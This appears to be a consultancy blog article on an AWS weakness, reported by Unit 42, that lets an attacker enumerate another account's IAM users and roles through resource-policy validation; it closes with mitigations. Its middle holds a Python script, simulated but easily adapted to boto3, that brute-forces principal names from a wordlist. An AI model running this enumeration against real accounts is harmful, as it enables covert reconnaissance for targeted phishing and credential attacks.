Amazon Web Services (AWS) is a popular cloud platform used by companies around the world. Moving business processes and operations to the cloud has proven beneficial to organisations, as it cuts the cost of setting up and running infrastructure.
AWS exposes its services through APIs (Application Programming Interfaces), and both internal and external applications are built on top of them. This is a great asset for businesses; however, the default behaviour of some of these APIs has a weakness that an attacker can use as a stepping stone to larger risks.
Researchers at Palo Alto Networks (Unit 42) discovered this weakness and advised that it allows threat actors to enumerate the IAM users and roles of a target organisation. That gives an attacker an account roster and a view of the organisation's internal structure, which makes it much easier to plan a targeted attack (for example phishing or credential attacks against specific identities). The only prerequisite is the target's 12-digit AWS account ID, which is not treated as a secret and is often exposed in public code, documentation or error messages.
The services whose resource-based policies exhibit this behaviour include the following:
- Amazon Simple Storage Service (S3)
- Amazon Key Management Service (KMS)
- Amazon Simple Queue Service (SQS)
With the target's account ID, an attacker can check whether a given IAM user or role exists in that account by naming it as the principal in a resource policy attached to a resource the attacker owns, such as their own S3 bucket, KMS key or SQS queue. AWS validates the principal before accepting the policy and rejects it if the identity does not exist, so the success or failure of the update reveals whether the name is real. From a list of confirmed identities the attacker can pick high-value targets, such as administrative roles, and work toward obtaining credentials for an identity with root-equivalent access.
Given enough time, the attacker can brute force identity names from a wordlist. Nothing in this process touches the target account: every API call is made against the attacker's own resource, so the validation failures are logged only in the attacker's account (for example in the attacker's CloudTrail). The targeted organisation sees no failed attempts and has no direct way to detect that it is being enumerated.
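The following Python script illustrates the enumeration loop described above. It is an added example, not code from the original article or from Palo Alto Networks. The target account ID, bucket name, wordlist and the set of "existing" identities are constructed for the demonstration, and the FakePolicyApi class stands in for the real AWS API: in practice the same loop would wrap a policy-update call such as boto3's s3.put_bucket_policy and treat the service's policy-validation error as "principal does not exist". The PolicyRejected exception is an assumption of this example; the real error code and message differ per service.

```python
"""Simulated cross-account IAM principal enumeration via resource-policy
validation. Example code added for illustration; all identifiers are
constructed and FakePolicyApi replaces the real AWS endpoint."""
import json


def build_policy(principal_arn: str, bucket: str) -> str:
    """Build a bucket policy that grants a single cross-account principal
    read access. The grant itself is irrelevant to the probe: the only thing
    that matters is whether AWS accepts the named principal."""
    doc = {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "Probe",
            "Effect": "Allow",
            "Principal": {"AWS": principal_arn},
            "Action": "s3:GetObject",
            "Resource": f"arn:aws:s3:::{bucket}/*",
        }],
    }
    return json.dumps(doc)


def candidate_arns(account_id: str, names):
    """Expand a wordlist into the user and role ARN forms AWS validates."""
    for name in names:
        yield f"arn:aws:iam::{account_id}:user/{name}"
        yield f"arn:aws:iam::{account_id}:role/{name}"


class PolicyRejected(Exception):
    """Hypothetical stand-in for the service-specific validation error
    (for S3 the real error is MalformedPolicy, 'Invalid principal in policy')."""


class FakePolicyApi:
    """Offline stand-in for the attacker-owned bucket's policy endpoint.
    'existing' is the constructed set of principal ARNs that exist in the
    target account; a real endpoint consults IAM instead."""

    def __init__(self, existing):
        self.existing = set(existing)
        self.calls = 0  # every probe is an API call in the attacker's account

    def put_bucket_policy(self, Bucket, Policy):
        self.calls += 1
        principal = json.loads(Policy)["Statement"][0]["Principal"]["AWS"]
        if principal not in self.existing:
            raise PolicyRejected("Invalid principal in policy")
        # A real call would now install the policy; nothing else to do here.


def enumerate_principals(api, bucket, account_id, wordlist):
    """Return the candidate ARNs the target account confirmed as existing.
    The victim is never contacted: only the attacker's bucket is touched."""
    found = []
    for arn in candidate_arns(account_id, wordlist):
        try:
            api.put_bucket_policy(Bucket=bucket, Policy=build_policy(arn, bucket))
        except PolicyRejected:
            continue  # identity does not exist; logged only on the attacker's side
        found.append(arn)
    return found


def demo():
    # Constructed target: account ID and identities are fictitious.
    target = "123456789012"
    api = FakePolicyApi({
        f"arn:aws:iam::{target}:user/admin",
        f"arn:aws:iam::{target}:role/deploy",
    })
    wordlist = ["admin", "deploy", "backup", "jenkins"]
    found = enumerate_principals(api, "attacker-probe-bucket", target, wordlist)
    return found, api.calls


if __name__ == "__main__":
    found, calls = demo()
    print(f"{calls} probes, {len(found)} identities confirmed:")
    for arn in found:
        print("  ", arn)
```

Every probe is a legitimate policy update on the attacker's own bucket, which is why the target's logs stay empty; the defender's only levers are the ones the next paragraph describes, such as removing unused identities and avoiding predictable names.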
Mitigation is possible, but under the shared responsibility model it falls largely on the organisation: there must be a strong Identity and Access Management (IAM) policy and framework, which in practice means removing inactive users and roles, avoiding predictable identity names, keeping privileges to the minimum required, and monitoring IAM activity for signs that an enumerated identity is being targeted. Another mitigation is cooperation with the vendor (Amazon), by ensuring the services in use are kept up to date and configured according to a documented secure baseline. Both parties have a responsibility to secure their part of the infrastructure.
For more information on securing your system and best cyber-management and cybersecurity planning, contact us.
Author: Saeed Baayoun, Agilient Consultant